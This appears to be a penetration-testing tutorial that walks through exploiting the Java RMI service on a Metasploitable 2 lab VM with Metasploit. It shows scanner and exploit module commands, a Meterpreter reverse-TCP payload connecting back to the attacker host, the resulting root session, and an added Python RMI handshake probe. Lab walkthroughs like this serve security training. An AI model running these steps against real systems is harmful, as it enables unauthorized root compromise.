Metasploitable 2 Server: Exploiting java_rmi (Java Remote Method Invocation) to gain root access

Goal: Exploit Java Remote Method Invocation (java_rmi) to get root access.

Java Remote Method Invocation, or Java RMI, is an object-oriented RPC mechanism that allows an object located in one Java virtual machine to call methods on an object located in another Java virtual machine. This enables developers to write distributed applications using an object-oriented paradigm.


Auxiliary scanning using msfconsole

Start the Metasploit database and console by typing the below command in the terminal:

┌─[mrdev@mr-dev]─[~]
└──╼ $ sudo msfdb init && sudo msfconsole
[sudo] password for mrdev: 
[+] Starting database
[i] The database appears to be already configured, skipping initialization
                                                  
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             https://metasploit.com


       =[ metasploit v6.1.9-dev                           ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: To save all commands executed since start up   to a file, use the makerc command

msf6 > 

There's an auxiliary scanner we can use to detect whether the target exposes a Java RMI endpoint with the insecure default that this exploit relies on. At the prompt, type search java_rmi and note the "auxiliary/scanner/misc/java_rmi_server" module.

msf6 > search java_rmi

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  auxiliary/gather/java_rmi_registry                               normal     No     Java RMI Registry Interfaces Enumeration
   1  exploit/multi/misc/java_rmi_server              2011-10-15       excellent  Yes    Java RMI Server Insecure Default Configuration Java Code Execution
   2  auxiliary/scanner/misc/java_rmi_server          2011-10-15       normal     No     Java RMI Server Insecure Endpoint Code Execution Scanner
   3  exploit/multi/browser/java_rmi_connection_impl  2010-03-31       excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalation


Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/browser/java_rmi_connection_impl

msf6 > 

Next, enter use auxiliary/scanner/misc/java_rmi_server (or use 2, its index in the search results), and type show options to display the module settings.

msf6 > use 2
msf6 auxiliary(scanner/misc/java_rmi_server) > show options  

Module options (auxiliary/scanner/misc/java_rmi_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    1099             yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/misc/java_rmi_server) >

The options show that RHOSTS is the only required value still empty, so set it to the target; THREADS can be raised as well, although a single host only needs one thread. Once both are set, run the module to find out whether the java_rmi exploit is possible or not.

msf6 auxiliary(scanner/misc/java_rmi_server) > set RHOSTS 192.168.56.3
RHOSTS => 192.168.56.3
msf6 auxiliary(scanner/misc/java_rmi_server) > set THREADS 16
THREADS => 16
msf6 auxiliary(scanner/misc/java_rmi_server) > run

[+] 192.168.56.3:1099     - 192.168.56.3:1099 Java RMI Endpoint Detected: Class Loader Enabled
[*] 192.168.56.3:1099     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/misc/java_rmi_server) >

The scanner detected a Java RMI endpoint on port 1099 with its class loader enabled, meaning the service will fetch classes it does not know from a remote codebase; this is the insecure default configuration the exploit module abuses, so the target is likely vulnerable. Let's try to exploit it.
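To see what the endpoint detection in the scanner above is actually doing, here is an added example written for this page (not code from the walkthrough or from Metasploit) that performs the first step of the Java RMI transport handshake in Python: it sends the "JRMI" header and checks whether the service answers with a ProtocolAck. A ProtocolAck only proves that an RMI transport is listening on the port; the "Class Loader Enabled" verdict needs the additional remote-codebase check that the Metasploit module performs, which this example does not implement. The sample reply bytes are constructed for the test, and the lab address 192.168.56.3 is taken from the walkthrough.

```python
"""Minimal Java RMI transport handshake probe (added example, not from the page).

The RMI transport protocol (Java RMI spec, section 10) starts with a client
header: the magic bytes "JRMI", a 2-byte version (2) and a protocol byte.
For StreamProtocol the server replies with a ProtocolAck byte followed by an
EndpointIdentifier (a Java modified-UTF host string and a 4-byte port), or
with a ProtocolNack if it rejects the protocol.
"""
import socket
import struct

RMI_MAGIC = b"JRMI"        # 0x4a524d49, start of every RMI transport stream
RMI_VERSION = 2            # transport protocol version
STREAM_PROTOCOL = 0x4B     # 'K': StreamProtocol
PROTOCOL_ACK = 0x4E        # 'N': server accepted the protocol
PROTOCOL_NACK = 0x4F       # 'O': server rejected the protocol

# Constructed sample of a JDK registry reply: Ack, then the client-visible
# host "192.168.56.1" (length 12) and port 0.  Not captured from a real host.
SAMPLE_ACK = b"\x4e\x00\x0c192.168.56.1\x00\x00\x00\x00"


def build_rmi_header(protocol=STREAM_PROTOCOL):
    """Return the 7-byte header a client sends to open an RMI connection."""
    return RMI_MAGIC + struct.pack(">H", RMI_VERSION) + bytes([protocol])


def parse_protocol_ack(data):
    """Parse the server's reply to the header.

    Returns a dict with the ack flag and, when present, the host and port
    from the EndpointIdentifier; returns None if the bytes are not an RMI
    transport reply at all (e.g. an HTTP error from a web server).
    """
    if not data:
        return None
    if data[0] == PROTOCOL_NACK:
        return {"ack": False, "host": None, "port": None}
    if data[0] != PROTOCOL_ACK:
        return None
    if len(data) < 3:
        return {"ack": True, "host": None, "port": None}
    host_len = struct.unpack(">H", data[1:3])[0]
    if len(data) < 3 + host_len + 4:
        # Ack seen but the endpoint identifier was truncated; still RMI.
        return {"ack": True, "host": None, "port": None}
    host = data[3:3 + host_len].decode("utf-8", errors="replace")
    port = struct.unpack(">i", data[3 + host_len:7 + host_len])[0]
    return {"ack": True, "host": host, "port": port}


def classify_reply(reply):
    """Label a reply as "rmi" (Ack or Nack seen) or "not-rmi"."""
    return "rmi" if parse_protocol_ack(reply) is not None else "not-rmi"


def probe_rmi(host, port=1099, timeout=3.0):
    """Connect, send the header and classify the reply.

    Returns "rmi", "not-rmi", or "closed" when the TCP connection fails.
    Useful as an inventory check for RMI registries exposed on a network.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_rmi_header())
            reply = s.recv(64)
    except OSError:
        return "closed"
    return classify_reply(reply)


if __name__ == "__main__":
    import sys
    # Offline demonstration on the constructed sample reply.
    print("sample reply ->", parse_protocol_ack(SAMPLE_ACK))
    # Live probe only when a host is given, e.g. the walkthrough's lab host 192.168.56.3.
    if len(sys.argv) > 1:
        print(sys.argv[1], "->", probe_rmi(sys.argv[1]))
```

Run it with no arguments to see the parsed sample reply, or with a host argument to probe port 1099 on a lab machine. A JDK registry typically echoes the client's own address as the host and 0 as the port, which is why the sample reply looks the way it does.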


Exploiting Java_RMI

Back in our previous search results, locate the "exploit/multi/misc/java_rmi_server" module, and type use exploit/multi/misc/java_rmi_server to load it. 

msf6 auxiliary(scanner/misc/java_rmi_server) > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) >

In the output above, the payload was automatically set to java/meterpreter/reverse_tcp. To choose a different one, run set payload <payload name>.

To see which payloads work with this exploit, use the show payloads command.

msf6 exploit(multi/misc/java_rmi_server) > show payloads 

Compatible Payloads
===================

   #   Name                                     Disclosure Date  Rank    Check  Description
   -   ----                                     ---------------  ----    -----  -----------
   0   payload/generic/custom                                    normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4   payload/java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5   payload/java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   6   payload/java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   7   payload/java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   8   payload/java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   9   payload/java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   10  payload/java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   11  payload/java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   12  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   13  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

msf6 exploit(multi/misc/java_rmi_server) > options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.xxx.xx.xxx   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf6 exploit(multi/misc/java_rmi_server) > 

The options show that RHOSTS and LHOST are the values we still have to set; set them, then run the exploit command.

msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.56.3
RHOSTS => 192.168.56.3
msf6 exploit(multi/misc/java_rmi_server) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(multi/misc/java_rmi_server) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.3:1099 - Using URL: http://0.0.0.0:8080/GRw8tQO7
[*] 192.168.56.3:1099 - Local IP: http://192.168.43.192:8080/GRw8tQO7
[*] 192.168.56.3:1099 - Server started.
[*] 192.168.56.3:1099 - Sending RMI Header...
[*] 192.168.56.3:1099 - Sending RMI Call...
[*] 192.168.56.3:1099 - Replied to request for payload JAR
[*] Sending stage (58060 bytes) to 192.168.56.3
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:51528) at 2022-01-20 15:37:03 +0530
[-] 192.168.56.3:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.56.3:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) >

Reading the output above, a Meterpreter session was opened even though the module then reported an HTTPDELAY timeout and "no session was created": the stage had already been delivered through the reverse TCP handler before the module's HTTP server gave up waiting. You can list the session with the below command:

msf6 exploit(multi/misc/java_rmi_server) > sessions  

Active sessions
===============

  Id  Name  Type                    Information            Connection
  --  ----  ----                    -----------            ----------
  1         meterpreter java/linux  root @ metasploitable  192.168.56.1:4444 -> 192.168.56.3:51528 (192.168.56.3)

msf6 exploit(multi/misc/java_rmi_server) >

The session list shows an active Meterpreter session running as root. Use the below command to interact with it and get the meterpreter prompt:

msf6 exploit(multi/misc/java_rmi_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid 
Server username: root
meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter > 

